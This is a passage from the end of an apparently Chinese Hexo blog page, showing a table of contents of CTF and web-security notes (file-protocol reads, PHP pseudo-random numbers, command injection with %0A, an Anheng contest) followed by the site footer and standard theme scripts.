              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#死在了flie协议读文件"><span class="nav-number">1.</span> <span class="nav-text">死在了flie协议读文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#憨批时刻之伪随机数php版本问题"><span class="nav-number">2.</span> <span class="nav-text">憨批时刻之伪随机数php版本问题</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#chrome新版hackbar不支持直接传内容"><span class="nav-number">3.</span> <span class="nav-text">chrome新版hackbar不支持直接传内容</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#命令注入中的-0A"><span class="nav-number">4.</span> <span class="nav-text">命令注入中的%0A</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#元旦的安恒赛"><span class="nav-number">5.</span> <span class="nav-text">元旦的安恒赛</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#守护"><span class="nav-number">5.1.</span> <span class="nav-text">守护</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#地图"><span class="nav-number">5.2.</span> <span class="nav-text">地图</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">cop</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  


  
    <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
  
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/miku.model.json"},"display":{"position":"right","width":300,"height":600},"mobile":{"show":true}});</script></body>
</html>
